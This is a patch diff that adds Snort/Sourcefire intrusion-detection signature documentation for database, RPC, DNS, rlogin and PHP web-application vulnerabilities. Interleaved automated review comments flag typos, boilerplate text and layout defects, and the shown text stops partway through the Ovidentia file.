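Review bot: the paragraph order in Detailed Information is inverted: the generic paragraph beginning "This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server." is about credential checking, does not describe a remote file include through the "admin_template_path" parameter, and comes after the Indexu-specific text; drop it or move it so the specific description leads, and fix "ona" to "on a". "an exploitation attempt has been attempted" in the Summary is redundant; "an exploitation attempt has been made" suffices. Blank lines are missing before the "--" separators that follow the Sid, Affected Systems and Contributors sections, which breaks the layout used by the rest of the files, and the trailing blank "+" line after the final "--" should go. "attackers choosing" should be "attacker's choosing".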
--- /dev/null
+++ b/doc/signatures/675.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+675
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
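Review bot: the Affected Systems section is empty. The Summary and Detailed Information refer to "Microsoft SQL" and "an implementation of Microsoft SQL server or client" but never say which product or versions sid 675 applies to; at minimum list "Microsoft SQL Server" (the product name as written is incomplete). The Additional References section is also empty even though Ease of Attack claims "Exploits exist." and the Summary calls this a known vulnerability; add a reference. Minor: double spaces after sentences in Detailed Information are inconsistent with the rest of the file.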
--- /dev/null
+++ b/doc/signatures/267.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+267
+
+--
+Summary:
+This event is generated when spurious DNS traffic is detected on the network. 
+
+--
+Impact:
+Ranges from harmless to severe.  A successful corrupted DNS IP and name pairing can range from harmless (if the IP is not used) to severe (if a user is misdirected to a hostile host).
+
+--
+Detailed Information:
+This event indicates that abnormal DNS traffic has been detected. The implications are varied and careful investigation of the source and destination should be undertaken.
+
+This may be the result of an improperly configured DNS server or it may be an indication that an attack against the DNS server is underway.
+
+--
+Affected Systems:
+Any DNS server.
+
+--
+Attack Scenarios:
+An attacker can spoof a DNS response to misrepresent an IP to host/name pairing.  The forged host name can direct a user to a potentially hostile host.
+
+--
+Ease of Attack:
+Simple to Difficult depending on the DNS implementation.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Consider using DNSSEC where appropriate.
+
+Keep all DNS software up to date and correctly configured.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
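Review bot: the documentation never states what the rule matches: the Summary says "spurious DNS traffic" and Detailed Information says "abnormal DNS traffic has been detected", but an analyst needs to know which DNS feature (query type, flag or response content) triggers sid 267 in order to choose between the "improperly configured DNS server" and "attack against the DNS server" interpretations the text offers. Spell out the matched condition in Detailed Information. Because a misconfigured server is named as one cause, False Positives should record that case rather than "None Known.". Minor: double spaces after sentences, an extra blank line before the final "--", and "Original rule writer unknown" lacks terminal punctuation.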
--- /dev/null
+++ b/doc/signatures/2313.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2313
+
+--
+Summary:
+This event is generated when suspicious shell code is detected in
+network traffic.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+This event is generated when suspicious shell code is detected. Many
+buffer overflow attacks contain large numbers of NOOP instrucions to pad
+out the request. Other attacks contain specific shell code sequences
+directed at certain applications or services.
+
+The shellcode in question may also use Unicode encoding.
+
+--
+Affected Systems:
+	Any software running on x86 architecture.
+
+--
+Attack Scenarios:
+An attacker may exploit a DCERPC service by sending shellcode in the RPC
+data stream. Sending large amounts of data to the Microsoft Workstation
+service can cause a buffer overflow condition in the logging function
+thus presenting an attacker with the opportunity to issue a DoS attack
+or in some cases, to execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+False positives may be generated by binary file transfers.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Make sure the target host has all current patches applied and has the
+latest software versions installed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
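Review bot: the Impact line "Denial of Service (DoS) possible execution of arbitrary code." is missing punctuation between the two outcomes; write "Denial of Service (DoS), possible execution of arbitrary code." "NOOP instrucions" in Detailed Information should be "NOOP instructions". The Summary and Detailed Information describe generic shellcode detection, while Attack Scenarios is specific to the Microsoft Workstation service over DCERPC; if sid 2313 is specific to that service the Summary should say so, otherwise the Attack Scenarios text should be presented as one example among many. The False Positives entry about binary file transfers is the right kind of note; keep it.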
--- /dev/null
+++ b/doc/signatures/2748.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2748
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_column_group
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
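Review bot: same layout defects as 2745.txt in this patch: the Detailed Information sentence is split so that a line begins with ". This procedure is included in"; join it as "vulnerability in the procedure comment_on_column_group. This procedure is included in dbms_repcat." "Oracle Oracle9i" under Affected Systems repeats the vendor name, several separators are "-- " with trailing whitespace, and the Additional References section is empty although the Summary calls this a known vulnerability.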
--- /dev/null
+++ b/doc/signatures/2772.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2772
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_date
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
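Review bot: as in 2745.txt and 2748.txt, the Detailed Information sentence is split so that a line begins with ". This procedure is included in"; join it as "vulnerability in the procedure drop_priority_date. This procedure is included in dbms_repcat." "Oracle Oracle9i" under Affected Systems repeats the vendor name, the "-- " separators carry trailing whitespace, and the Additional References section is empty. Since these Oracle files share all text except the procedure name, a single fix applied to the template would correct all of them.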
--- /dev/null
+++ b/doc/signatures/3411.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3411
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
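Review bot: this file is identical to 3437.txt in this patch apart from the Sid, including the typo "Expoit code exists." under Ease of Attack; as written, sids 3411 and 3437 cannot be distinguished from their documentation. Each file should say what its rule matches (which RPC interface, port or request shape) so an analyst can tell the two events apart. The same comments as for 3437.txt apply: fix "Expoit" to "Exploit", cite the vendor bulletin under the empty Additional References section, and note in Corrective Action that filtering ports 135, 139 and 445 "from external sources" leaves internal hosts able to reach them.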
--- /dev/null
+++ b/doc/signatures/2959.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2959
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
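Review bot: the Impact line "Serious. Execution of arbitrary code with system level privileges" and the Corrective Action line "Apply the appropriate vendor supplied patches" lack terminal periods, unlike the rest of the file. The Affected Systems entry "Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems." is out of release order; listing 98, ME, NT, 2000, XP, 2003 is easier to scan. Otherwise this file is the model the others in the patch should follow: it cites its vendor bulletin (MS04-031) under Additional References and explains the local privilege escalation case in Detailed Information.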
--- /dev/null
+++ b/doc/signatures/2817.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2817
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_column_group_to_flavor
+. This procedure is included in
+sys.dbms_repcat_fla_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
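Review bot: same template defect as the other Oracle files in this patch: the Detailed Information sentence is split so that a line begins with ". This procedure is included in"; join it as "vulnerability in the procedure add_column_group_to_flavor. This procedure is included in sys.dbms_repcat_fla_mas." Note that this file names the package with its schema prefix ("sys.dbms_repcat_fla_mas") while 2745.txt, 2748.txt and 2772.txt write "dbms_repcat" without one; pick one convention. "Oracle Oracle9i" under Affected Systems repeats the vendor name, and the Additional References section is empty.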
--- /dev/null
+++ b/doc/signatures/100000327.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000327
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "ScozNet ScozNews" application running on a webserver. Access to the file "admin_import.php" using a remote file being passed as the "main_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "main_path" parameter in the "admin_import.php" script used by the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
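Review bot: the file starts with two empty "+" lines before "Rule:" and ends with one after the final "--"; the other files in this patch begin at "Rule:" directly, so drop them. In the Summary, "an exploitation attempt has been attempted" is redundant ("an exploitation attempt has been made"); "running ona web server" should be "running on a web server"; "attackers choosing" should be "attacker's choosing" (twice). The third Detailed Information paragraph about credential validation is generic boilerplate that does not describe a remote file include via the "main_path" parameter and should be removed. The paragraphs are single very long lines where the rest of the patch wraps at roughly 72 columns, and the Additional References section is empty.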
--- /dev/null
+++ b/doc/signatures/2297.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2297
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
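Review bot: Detailed Information contains a comma splice: "This application does not perform stringent checks when handling user input, this may lead to the attacker being able to execute PHP code, include php files ..."; split it at the first comma ("... user input. This may lead to ...") and capitalise "PHP" consistently ("include PHP files"). Attack Scenarios is the generic credential-guessing boilerplate rather than the PHP code execution and file inclusion path that Detailed Information describes; describe the actual vector (crafted input to the Advanced Poll scripts) so the sections agree. The Additional References section is empty although the Summary calls this a known vulnerability in a specific version (2.0.2); cite it.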
--- /dev/null
+++ b/doc/signatures/875.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+875
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
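Review bot: this file is a word-for-word copy of 895.txt in this patch with only the Sid changed, including its typos ("running ona web server", "attackers choosing") and the unwrapped line "relationships between the victim server and other hosts can be exploited by the attacker."; fix the typos in both files, and give each the name of the CGI script its rule matches, otherwise sids 875 and 895 are indistinguishable from their documentation. The Additional References section is empty in both despite "Exploits exist." under Ease of Attack.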
--- /dev/null
+++ b/doc/signatures/100000823.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000823
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "VBZooM" application running on a webserver. Access to the file "ignore-pm.php" with SQL commands being passed as the "UserID" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "UserID" parameter in the "ignore-pm.php" script used by the "VBZooM" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZooM
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
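Review bot: the third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. ...") is about credential validation and does not describe SQL injection through the "UserID" parameter; drop it, since the first two paragraphs already cover the issue. The second paragraph is a comma splice ("... compromise the database backend for the application, the attacker may also be able to ..."); split it into two sentences. Blank lines are missing before the "--" separators after Sid, Affected Systems and Contributors, and the file has two empty "+" lines before "Rule:". "has been attempted" in the Summary is redundant, and the script is described as a "CGI application" although "ignore-pm.php" is a PHP script. The Additional References entry is a generic SQL injection article; a reference specific to the VBZooM issue would be more useful to an analyst.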
--- /dev/null
+++ b/doc/signatures/611.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid: 611
+
+--
+Summary: 
+This event is generated when a remote login attempt using rlogin fails.
+
+--
+Impact: 
+Someone has tried to login using rlogin and failed
+
+-- 
+Detailed Information: 
+This rule generates an event when a login failure message generated by rlogind is seen. rlogin is used on UNIX systems for remote connectivity and remote command execution.  
+
+Multiple events may indicate that an attacker is attempting a brute force password guessing attack.
+
+--
+Attack Scenarios: 
+An attacker finds a machine with rlogin service running and proceeds to guess the password remotely by connecting multiple times.
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+A legitimate user may generate an event by entering an incorrect password.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0651
+
+Arachnids:
+http://www.whitehats.com/info/IDS392
+
+--
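Review bot: the Affected Systems section is missing entirely: the file goes from Detailed Information straight to Attack Scenarios, whereas every other signature file in this patch has an Affected Systems section between them; add it (per Detailed Information, UNIX systems running rlogind). The Sid is written inline as "Sid: 611" while the other files put the number on its own line after "Sid:"; normalise the layout so tooling that parses these files sees one format. Minor: the Impact line and the first Corrective Action line lack terminal punctuation, and there are double spaces after sentences in Detailed Information. The False Positives entry (a legitimate user mistyping a password) is a good model the files with "None known." could follow.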
--- /dev/null
+++ b/doc/signatures/100000344.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000344
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SocketMail" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "site_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "site_path" parameter in the "index.php" script used by the "SocketMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SocketMail
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
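Review bot: the Summary's "may indicate that an exploitation attempt has been attempted" is tautological; "may indicate an exploitation attempt" is enough. In Detailed Information, "running ona web server" should read "running on a web server", and the third paragraph about validating client credentials is generic CGI boilerplate that does not describe a remote file include; one sentence saying that a URL supplied in "site_path" is fetched and executed by the script's include would tell the analyst what the event actually means. Additional References is empty even though a specific script ("index.php") and parameter are named; add the advisory the rule was written from.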
--- /dev/null
+++ b/doc/signatures/100000622.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000622
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "mail_modify.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "mail_modify.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
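Review bot: the separator lines after the Sid value, after "All systems running CGI applications using Indexu" and after the Contributors list are not preceded by a blank line, unlike every other section in this file and the other docs in the patch; add them so the files parse consistently. The Summary repeats "exploitation attempt has been attempted", Detailed Information has "ona web server", and the paragraph about validating client credentials does not describe a remote file include via "admin_template_path". Additional References is empty although the vulnerable script and parameter are named.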
--- /dev/null
+++ b/doc/signatures/100000393.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000393
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "start.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "start.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
